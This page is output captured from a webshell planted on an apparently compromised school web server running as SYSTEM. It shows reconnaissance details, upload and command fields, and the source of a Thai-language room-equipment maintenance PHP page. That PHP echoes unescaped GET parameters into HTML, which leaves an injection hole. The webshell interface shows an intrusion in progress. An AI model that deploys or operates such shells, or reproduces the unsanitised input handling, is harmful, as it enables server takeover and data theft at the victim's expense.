403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/myschool/benjama/modules/maintenance/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : E:/Inetpub/www/myschool/benjama/modules/maintenance/room.php
<?
require_once($MODPATH ."inc.php") ;

echo "<FORM METHOD=GET ACTION=\"\" onchange=\"javascript:this.submit();\">";
echo "<input type=hidden name=name value=$_GET[name]>";
echo "<input type=hidden name=file value=$_GET[file]>";
echo "<input type=checkbox name=order value='rname' ".(($_GET[order])?'checked':'')." > เรียงตามห้อง";
echo "</form>";
$forder = ($_GET[order])?'rorder':'room';
$rorder = " if(substring(rname,2,1)='/' and LENGTH(rname)=3,REPLACE(rname,'/','/0'),rname) as rorder " ;

$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[room] = $db->select_query($sql="SELECT * ,$rorder FROM ".TB_room." ORDER BY $forder" );
//echo $sql ;
echo "<table border=1 cellspacing=0><tr>";
echo "<td align=center>เลขห้อง</td>";
echo "<td align=center>ห้อง</td>";
echo "<td align=center>computer</td>";
echo "<td align=center>projector</td>";
echo "<td align=center>visual</td>";
echo "<td align=center>เครื่องขยายเสียง</td>";
echo "<td align=center></td></tr>";
while ($arr[room] = $db->fetch($res[room])){
    echo "<tr>";
//    print_r($arr[room] );
    echo "<td align=center><a href=?name=maintenance&file=roomedit&id=" . $arr[room][room] .">" . $arr[room][room] ."</a></td>";
    echo "<td>" . $arr[room][rname] ."</td>";
    $res[device] = $db->select_query($sql="SELECT * FROM ".TB_device." WHERE status=1 AND room='" .$arr[room][room] ."' AND type='com'" );
    $arr[device] =$db->fetch($res[device]);
    echo "<td>".  $arr[device][brand] ." " .$arr[device][model] ."</td>";

    $res[device] = $db->select_query($sql="SELECT * FROM ".TB_device." WHERE status=1 AND room='" .$arr[room][room] ."' AND type='projector'" );
    $arr[device] =$db->fetch($res[device]);
    echo "<td>".  $arr[device][brand] ." " .$arr[device][model] ."</td>";

    $visual = $db->num_rows(TB_device,"id"," status=1 AND room='" .$arr[room][room] ."' AND type='visual'" );
    echo "<td align=center>" .(($visual)? "yes" : " ") . "</td>";

    $audio = $db->num_rows(TB_device,"id"," status=1 AND room='" .$arr[room][room] ."' AND type='sound'" );
    echo "<td align=center>" .(($audio)? "yes" : " ") . "</td>";

    echo "</tr>";
    
}
echo "</table>";
?>

Youez - 2016 - github.com/yon3zu
LinuXploit